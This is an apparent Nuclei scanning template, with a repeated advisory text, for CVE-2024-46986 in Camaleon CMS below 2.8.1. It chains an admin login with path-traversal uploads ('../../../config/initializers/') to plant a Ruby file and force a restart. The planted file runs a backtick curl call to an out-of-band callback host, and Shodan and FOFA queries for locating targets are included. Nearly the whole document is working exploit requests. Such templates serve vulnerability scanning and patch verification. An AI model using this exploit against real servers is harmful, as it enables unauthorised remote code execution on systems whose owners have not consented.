An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
PoC代码[已公开]
id: CVE-2024-46986
info:
name: Camaleon CMS < 2.8.1 Arbitrary File Write to RCE
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application
reference:
- https://github.com/advisories/GHSA-wmjg-vqhv-q5p5
- https://codeql.github.com/codeql-query-help/ruby/rb-path-injection
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2024-46986
cwe-id: CWE-22,CWE-74
epss-score: 0.87788
epss-percentile: 0.99443
cpe: cpe:2.3:a:tuzitio:camaleon_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 4
verified: true
vendor: tuzitio
product: camaleon_cms
shodan-query: title:"Camaleon CMS"
fofa-query: title="Camaleon CMS"
tags: cve,cve2024,camaleon,intrusive,rce,file-upload,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
filename: "{{to_lower(rand_text_alpha(12))}}"
flow: http(1) && http(2) && http(3) && http(4)
http:
- raw:
- |
GET /admin/login HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
internal: true
name: nonce
group: 1
regex:
- 'name="authenticity_token" value="(.*?)"'
- raw:
- |
POST /admin/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
authenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}
matchers:
- type: dsl
dsl:
- 'contains(location,"/admin/dashboard")'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="{{filename}}.rb"
Content-Type: text/x-ruby-script
`curl {{interactsh-url}}`
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../config/initializers/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers:
- type: word
part: body
words:
- '{"name":"{{filename}}.rb","folder_path":"../../../config/initializers"'
internal: true
- raw:
- |
POST /admin/media/upload?actions=false HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="file_upload"; filename="restart.txt"
Content-Type: text/x-ruby-script
{{randstr}}
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="folder"
../../../tmp/
------WebKitFormBoundarynJs8ffRP2MgQXiF8
Content-Disposition: form-data; name="skip_auto_crop"
true
------WebKitFormBoundarynJs8ffRP2MgQXiF8--
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- dns
- type: word
part: body
words:
- '{"name":"restart.txt","folder_path":"../../../tmp"'
# digest: 490a00463044022067cb70f4f8d7202353f85343a8df880ff11a4c77f3fad13c595bdd9c801e070202206c135c2490325094a385fc7626bfcd58e8a9128f068662b37502a8c62f759526:922c64590222798bb761d5b6d8e72950